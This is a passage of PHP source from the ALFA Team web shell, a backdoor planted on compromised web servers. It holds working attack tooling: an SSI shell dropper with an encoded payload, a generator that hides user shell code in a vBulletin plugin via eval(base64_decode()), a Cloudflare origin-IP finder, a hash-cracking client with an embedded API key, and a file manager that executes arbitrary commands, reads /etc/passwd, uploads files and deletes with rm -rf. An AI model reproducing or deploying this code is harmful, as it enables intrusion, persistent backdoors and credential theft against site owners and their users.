		$data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa",false,true,true);
		if(@is_array(@json_decode($data,true))){
			$_SESSION["updateheader_data"] = $data;
			echo $data;
		}
	}else{
		echo $_SESSION["updateheader_data"];
	}
}
function alfassiShell(){
alfahead();
echo '<div class=header>';
@mkdir('alfa_shtml',0755);
@chdir('alfa_shtml');
alfacgihtaccess('shtml');
$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
@__write_file('alfa_ssi.shtml',__get_resource($code));
@chmod("alfa_ssi.shtml",0755);
echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
echo '</div>';
alfafooter();
}
function alfacloudflare(){
alfahead();
AlfaNum(8,9,10,7,6,5,4,3);
echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
$url = $_POST['alfa1'];
if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
$url = preg_replace('/^(https?):\/\//', '', $url);
$url = "http://www.".$url;
}
$headers = @get_headers($url, 1);
$server = $headers['Server'];
$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
$url = explode($matches[0], $url);
$url = $url[1];}}
if(is_array($server))$server = $server[0];
echo __pre();
if(preg_match('/cloudflare/i', $server))
echo "\n[+] CloudFlare detected: {$server}\n<br>";
else
echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
echo "[+] Searching for more IP addresses.\n\n<br><br>";
for($x=0;$x<count($subs);$x++){
$site = $subs[$x] . $url;
$ip = is_ipv4(gethostbyname($site));
if($ip == '(Null)')
continue;
echo "Trying {$site}: {$ip}\n<br>";
}
echo "\n[+] Finished.\n<br>";
}
echo '</div>';
alfafooter();
}
function is_ipv4($ip){
return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
}
function __alert($s){
echo '<center>'.__pre().$s.'</center>';
}
function create_table($data){
echo '<table border="1">';
foreach ($data as $key => $val){
$array = array();
foreach($val as $k => $v){
$array[$k] = $v;
}
echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
}
echo '</table>';
}
function alfaphp2xml(){
alfahead();
AlfaNum(8,9,10,7,6,5,4,3);
echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
<input type='submit' name='go' value=' ' /></p></form></center>";
if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
echo '</textarea></center></p>';
}
echo '</center></div>';
alfafooter();
}
function alfacpcrack(){
alfahead();
echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
if($_POST['alfa1']=='dec'){
$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
if($_POST['alfa3'] == '>>'){
$hash = $_POST['alfa2'];
if(!empty($hash)){
$hash_type = $_POST['alfa4'];
$email = "solevisible@gmail.com";
$code = "7b9fa79f92c3cd96";
$target = "http://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
$resp = @file_get_contents($target);
if($resp==''){
$get = new AlfaCURL();
$resp = $get->Send($target);
}
echo __pre().'<center>';
switch($resp){
	case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
	case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
	case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
	case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
}
if(substr($resp,0,4)!='CODE'&&$resp!=''){
echo "<b>Result: <font color='green'>".$resp."</font></b>";
}elseif(substr($resp,0,4)!='CODE'){
echo "<font color='red'>NoT Found</font><br />";
}
echo('</center>');
}
}
}
if($_POST['alfa1']=='analyzer'){
echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
if($_POST['alfa3'] == '>>'){
$hash = $_POST['alfa2'];
if(!empty($hash)){
$curl = new AlfaCURL();
$resp = $curl->Send("http://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
echo(__pre().'<center>');
if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
	echo('<font color="green">'.$s[1].'</font>');
}else{
	echo('<font color="red">Not Found...!</font>');
}
echo('</center><br>');
}
}
}
echo '</div>';
alfafooter();
}
function alfafooter(){
if(!isset($_POST['ajax'])){
echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
<tr>
<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
</tr>
<tr>
<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
<td colspan='2'><form onsubmit=\"editor(this.file.value,'auto','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
</tr>
<tr>
<td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);this.c.value='';return false;\"><span><span class='footer_text'>Execute :</span><br><input class='foottable' type='text' name='c' value=' '> <input type='submit' value=' '></form></td>
</tr>
<tr>
<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
<input type='hidden' name='a' value='FilesMAn'>
<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
<input type='hidden' name='alfa1' value='uploadFile'>
<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong>&nbsp;&nbsp;Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);'></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam &copy; 2012-".date('Y')." ]</span></td>
</tr>
</table>
</div>
<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='margin-left:14px;margin-right:30px;'></div></div></div>
<div id='editor'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'></div></div></div></div></div>
<div id='update-content'></div>
<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Editor</div></div></div>
<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><div class='minimized-text'>Show Cgi</div></div></div>
<script>
	$('search-input').addEventListener('keydown', function(e){
		setTimeout(function(){
			var string = $('search-input').value
			d.getElementsByClassName('history-list')[0].innerHTML = '';
			for(var i in editor_files){
				if(editor_files[i].file.search(string) != -1 || string == ''){
					var mode = 0;
					if(i == editor_current_file){
						mode = ' is_active';
					}
					insertToHistory(i, editor_files[i].file, mode, editor_files[i].type);
				}
			}
		}, 100);
	},false);
	_Ajax(d.URL, 'a='+alfab64('checkupdate'), function(res){
		d.body.insertAdjacentHTML('beforeend', res);
	});
	if(".$GLOBALS["need_to_update_header"]."){
		_Ajax(d.URL, 'a='+alfab64('updateheader'), function(res){
			try{
				var data = JSON.parse(res);
				console.log(data);
				for(var i in data){
					var html = '';
					for(var b = 0; b < data[i].length; b++){
						if(i=='useful'||i=='downloader'){
							html += '<span class=\"header_values\" style=\"margin-left: 4px;\">'+data[i][b]+'</span>';
						}else{
							html += data[i][b];
						}
					}
					var elem = $('header_'+i);
					if(elem){elem.innerHTML = html;}
				}
				$('header_cgishell').innerHTML = 'ON';
				$('header_cgishell').setAttribute('class', 'header_on');
			}catch(e){console.log(e)}
		});
	}else if(islinux){
		_Ajax(d.URL, 'a='+alfab64('checkcgi'), function(res){
			if(res=='ok'){
				$('header_cgishell').innerHTML = 'ON';
				$('header_cgishell').setAttribute('class', 'header_on');
			}
		});
	}
</script>
</body>
</html>
";
}}
if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
function posix_getpwuid($p) {return false;} }
if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
function posix_getgrgid($p) {return false;} }
function alfaWhich($p) {
$path = alfaEx('which ' . $p,false,false);
if(!empty($path))
return strlen($path);
return false;
}
function alfaSize($s) {
if($s >= 1073741824)
return sprintf('%1.2f', $s / 1073741824 ). ' GB';
elseif($s >= 1048576)
return sprintf('%1.2f', $s / 1048576 ) . ' MB';
elseif($s >= 1024)
return sprintf('%1.2f', $s / 1024 ) . ' KB';
else
return $s . ' B';
}
function alfaPerms($p) {
if (($p & 0xC000) == 0xC000)$i = 's';
elseif (($p & 0xA000) == 0xA000)$i = 'l';
elseif (($p & 0x8000) == 0x8000)$i = '-';
elseif (($p & 0x6000) == 0x6000)$i = 'b';
elseif (($p & 0x4000) == 0x4000)$i = 'd';
elseif (($p & 0x2000) == 0x2000)$i = 'c';
elseif (($p & 0x1000) == 0x1000)$i = 'p';
else $i = 'u';
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
return $i;
}
function alfaPermsColor($f,$isbash=false){
$class = "";
$num = "";
$human = "";
if($isbash){
$class = $f["class"];
$num = $f["num"];
$human = $f["human"];
}else{
$num = substr(sprintf('%o', @fileperms($f)),-4);
$human = alfaPerms(@fileperms($f));
if(!@is_readable($f))
$class = "main_red_perm";
elseif (!@is_writable($f))
$class = "main_white_perm";
else
$class = "main_green_perm";
}
return '<span style="font-weight:unset;" class="'.$class.'">'.$num.'</span><span style="font-weight:unset;" class="beetween_perms"> >> </span><span style="font-weight:unset;" class="'.$class.'">'.$human.'</span>';
}
if(!function_exists("scandir")) {
function scandir($dir) {
$dh = opendir($dir);
while (false !== ($filename = readdir($dh)))
$files[] = $filename;
return $files;
}
}
function reArrayFiles($file_post){
$file_ary = array();
$file_count = count($file_post['name']);
$file_keys = array_keys($file_post);
for ($i=0; $i<$file_count; $i++) {
foreach ($file_keys as $key) {
$file_ary[$i][$key] = $file_post[$key][$i];
}
}
return $file_ary;
}
function _alfa_can_runCommand($cgi=true,$cache=true){
	if(isset($_SESSION["alfa_canruncmd"])&&$cache){
		return true;
	}
	if(strlen(alfaEx("whoami",false,$cgi))>0){
		$_SESSION["alfa_canruncmd"] = true;
		return true;
	}
	return false;
}
function _alfa_symlink($target, $link){
	$phpsym = function_exists("symlink");
	if($phpsym){
		@symlink($target, $link);
	}else{
		alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");
	}
}
function _alfa_file_exists($file,$cgi=true){
	if(@file_exists($file)){
		return true;
	}else{
		if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){
			return true;
		}
	}
	return false;
}
function _alfa_file($file,$cgi=true){
	$array = @file($file);
	if(!$array){
		if(strlen(alfaEx("id",false,$cgi))>0){
			$data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);
			if(strlen($data)>0){
				return explode("\n", $data);
			}else{
				return false;
			}
		}else{
			return false;
		}
	}else{
		return $array;
	}
}
function _alfa_is_writable($file){
	$check = false;
	$check = @is_writable($file);
	if(!$check){
		if(_alfa_can_runCommand()){
			$check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');
			if($check == "yes"){
				$check = true;
			}else{
				$check = false;
			}
		}
	}
	return $check;
}
function _alfa_is_dir($dir,$mode="-d"){
	$check = false;
	$check = @is_dir($dir);
	if(!$check){
		if(_alfa_can_runCommand()){
			$check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');
			if($check == "yes"){
				return true;
			}else{
				return false;
			}
		}
	}
	return $check;
}
function alfaFilesMan(){
alfahead();
AlfaNum(8,9,10,7,6,5,4);
echo '<div class="ajaxarea"><div class="header">';
if(!empty ($_COOKIE['f']))
$_COOKIE['f'] = @unserialize($_COOKIE['f']);
if(!empty($_POST['alfa1'])){
switch($_POST['alfa1']){
case 'uploadFile':
if(isset($GLOBALS['glob_chdir_false'])){
	$alfa_canruncmd = _alfa_can_runCommand(true,true);
	$move_cmd_file = true;
}
$files = reArrayFiles($_FILES['f']);
foreach($files as $file){
if($move_cmd_file){
	alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");
}else{
	@move_uploaded_file($file['tmp_name'],$file['name']);
}
echo "uped...!<Br>";
}
break;
case 'mkdir':
$new_dir_cmd = false;
if(isset($GLOBALS['glob_chdir_false'])){
	if(_alfa_can_runCommand(true,true)){
		alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");
	}
}else{
if(!@mkdir(trim($_POST['alfa2'])))
echo "<b><font color='red'>Can't create new dir !</b></font>";
}
break;
case 'delete':
function deleteDir($path){
$path = (substr($path,-1)=='/') ? $path:$path.'/';
$dh = @opendir($path);
while(($item = @readdir($dh)) !== false){
$item = $path.$item;
if((basename($item) == "..") || (basename($item) == "."))
continue;
$type = @filetype($item);
if ($type == "dir")
deleteDir($item);
else
@unlink($item);
}
@closedir($dh);
@rmdir($path);
}
if(is_array(@$_POST['f']))
foreach($_POST['f'] as $f){
if($f == '..')
continue;
$f = rawurldecode($f);
if(isset($GLOBALS["glob_chdir_false"])){
	if(_alfa_can_runCommand(true,true)){
		alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");
	}
}else{
alfaEx("rm -rf '".addslashes($f)."'",false,false);
if(@is_dir($f))
deleteDir($f);
else
@unlink($f);
}
}
if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){
deleteDir(rawurldecode(@$_POST['alfa2']));
alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);
}else{
@unlink(rawurldecode(@$_POST['alfa2']));
}
if(isset($GLOBALS["glob_chdir_false"])){
	$source = rawurldecode(@$_POST['alfa2']);
	if($source!='..'&&!empty($source)){
		if(_alfa_can_runCommand(true,true)){
			alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");
		}
	}
}
break;
case 'paste':
if($_SESSION['act'] == 'copy'&&isset($_SESSION['f'])){
function copy_paste($c,$s,$d){
if(@is_dir($c.$s)){
@mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if (($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
} elseif(is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_SESSION['f'] as $f)
copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
}elseif($_SESSION['act'] == 'move'&&isset($_SESSION['f'])){
function move_paste($c,$s,$d){
if(@is_dir($c.$s)){
@mkdir($d.$s);
$h = @opendir($c.$s);
while (($f = @readdir($h)) !== false)
if(($f != ".") and ($f != ".."))
copy_paste($c.$s.'/',$f, $d.$s.'/');
}elseif(@is_file($c.$s))
@copy($c.$s, $d.$s);
}
foreach($_SESSION['f'] as $f)
@rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
}elseif($_SESSION['act'] == 'zip'&&isset($_SESSION['f'])){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
$zipX = "alfa_".rand(1,1000).".zip";
if($zip->open($zipX, 1)){
@chdir($_SESSION['c']);
foreach($_SESSION['f'] as $f){
if($f == '..')continue;
if(@is_file($_SESSION['c'].$f))
$zip->addFile($_SESSION['c'].$f, $f);
elseif(@is_dir($_SESSION['c'].$f)){
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
foreach($iterator as $key=>$value){
$key = str_replace('\\','/',realpath($key));
if(@is_dir($key)){
if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;
}else{$zip->addFile($key,$key);}}}}
@chdir($GLOBALS['cwd']);
$zip->close();
__alert('>> '.$zipX.' << is created...');}}
}elseif($_SESSION['act'] == 'unzip'&&isset($_SESSION['f'])){
if(class_exists('ZipArchive')){
$zip = new ZipArchive();
foreach($_SESSION['f'] as $f) {
if($zip->open($_SESSION['c'].$f)){
$zip->extractTo($GLOBALS['cwd']);
$zip->close();}}}}
unset($_SESSION['f']);
break;
default:
if(!empty($_POST['alfa1'])){
$_SESSION['act'] = @$_POST['alfa1'];
$_SESSION['f'] = @$_POST['f'];
$_SESSION['c'] = @$_POST['c'];
}
break;
}
}
if(isset($_SESSION[__LAST_CWD__]) && !isset($_POST['c']) && $_SESSION[__LAST_CWD__] != ''){
	$dirContent = @scandir($_SESSION[__LAST_CWD__]);
}else{
	$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
	if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){
		$path = explode('/', $res[1]);
		array_pop($path);
		$_POST['c'] = implode('/', $path);
	}
	$_SESSION[__LAST_CWD__] = str_replace(array("..","//"), array("","/"), $_POST['c']);
}
$cmd_dir = false;
if($dirContent === false){
	if(_alfa_can_runCommand(true,true)){
		@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
		if(!isset($_SESSION["alfachdir_bash"])||@!file_exists("alfacgiapi/getdir.alfa")){
			$bash = "jZNvb5swEMZfw6e4eaZppaIk3Z9INLyYNHXq2017UYWocsEEa2AjQ5SxNN99PmMIlTJpEVLOv+fu8Rkf79/N942evwg5bwr/6+P3mC79x4cfMZ0lcubztFBANsTPlQYBQgK9LhsIGYThTqt9HWZC87RVWvAmzIVuWqDG5eYeMuWD+dWsLWKCbE4F8T0hcxXT66ZlLYQpkOAhCn5GwbcoaKLgKVoELAq+EKBYd+N72MosmoHmLINQ485Ma9bBer0GQtHNmLZdzWN6tMpmsT3ZndVBcj3SpaO265HeGeo14s+5+gOSSmUi70b20dXWXFdyX43804QX+4rJUfmMLiKHzcacpK+COAayWK5WKwLb7T20BZe+5w2eZIGKA70ZyfTht30Mz8VgGB7MwfH1oA9cXVmmJ+yNd6pKpWNSMSGfd5pz+YzUGPLS2f1X6aEQLT+XNvxCjubZkHHuluLd2LMPk9K92cheHWqTls41mu/2JdOQi5Lb476+Xk7gVd12/05ruupFlSKFUshfF/a3hX3bduSPCZGs4gmJIDFTlpBb84+pjvQhQjtljroYsR0zh12MGEfN0T5E2E+bw8MCBTcbThlXg2SnZCK69SDbq5nIbn269TMlufu0j6ct+Qs=";
			alfaWriteTocgiapi("getdir.alfa",$bash);
		}
		if(empty($_SESSION[__LAST_CWD__]))$_SESSION[__LAST_CWD__] = "/";
		$dirContent = alfaEx("cd alfacgiapi;sh getdir.alfa '".addslashes($_SESSION[__LAST_CWD__])."'");
		$dirContent = json_decode($dirContent, true);
		if(is_array($dirContent)){
			array_pop($dirContent);
			$cmd_dir = true;
		}else{
			$dirContent = false;
		}
		$_SESSION["alfachdir_bash"] = true;
	}
}
if($dirContent == false){
echo '<center><br><span style="font-size:16px;"><span style="color: red; -webkit-text-shadow: 1px 1px 13px;"><strong><b><big>!!! Access Denied !!!</b></big><br><br></strong></div>';
alfaFooter();
return;
}
global $sort;
$sort = array('name', 1);
if(!empty($_POST['alfa1'])) {
if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))
$sort = array($match[1], (int)$match[2]);
}
echo "<form onsubmit='fc(this);return false;' name='files' method='post'><table width='100%' class='main' cellspacing='0' cellpadding='2'><tr><th width='13px'><div class='myCheckbox' style='padding-left:0px;'><input type='checkbox' id='mchk' onclick='checkBox();' class='chkbx'><label for='mchk'></label></div></th><th>Name</th><th>Size</th><th>Modify</th><th>Owner/Group</th><th>Permissions</th><th>Actions</th></tr>";
$dirs = $files = array();
$n = count($dirContent);
for($i=0;$i<$n;$i++){
if($cmd_dir){
$filename = $dirContent[$i]["name"];
$file_owner = $dirContent[$i]["owner"];
$file_group = $dirContent[$i]["group"];
$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);
$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);
$file_size = $dirContent[$i]["size"];
$file_path = $_SESSION[__LAST_CWD__]."/".$dirContent[$i]["name"];
}else{
$filename = $dirContent[$i];
$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");
$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");
$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");
$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");
$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));
$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);
$file_size = @filesize($GLOBALS['cwd'].$filename);
$file_path = $GLOBALS['cwd'].$filename;
}
$tmp = array('name' => $filename,
'path' => $file_path,
'modify' => $file_modify,
'perms' => $file_perm,
'size' => $file_size,
'owner' => $file_owner,
'group' => $file_group
);
if(!$cmd_dir){
if(@is_file($file_path))
$files[] = array_merge($tmp, array('type' => 'file'));
elseif(@is_link($file_path))
$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
elseif(@is_dir($file_path)&& ($filename != "."))
$dirs[] = array_merge($tmp, array('type' => 'dir'));
}else{
	if($dirContent[$i]["type"]=="file"){
		$files[] = array_merge($tmp, array('type' => 'file'));
	}else{
		if($dirContent[$i]["name"] != "."){
			$dirs[] = array_merge($tmp, array('type' => 'dir'));
		}
	}
}
}
$GLOBALS['sort'] = $sort;
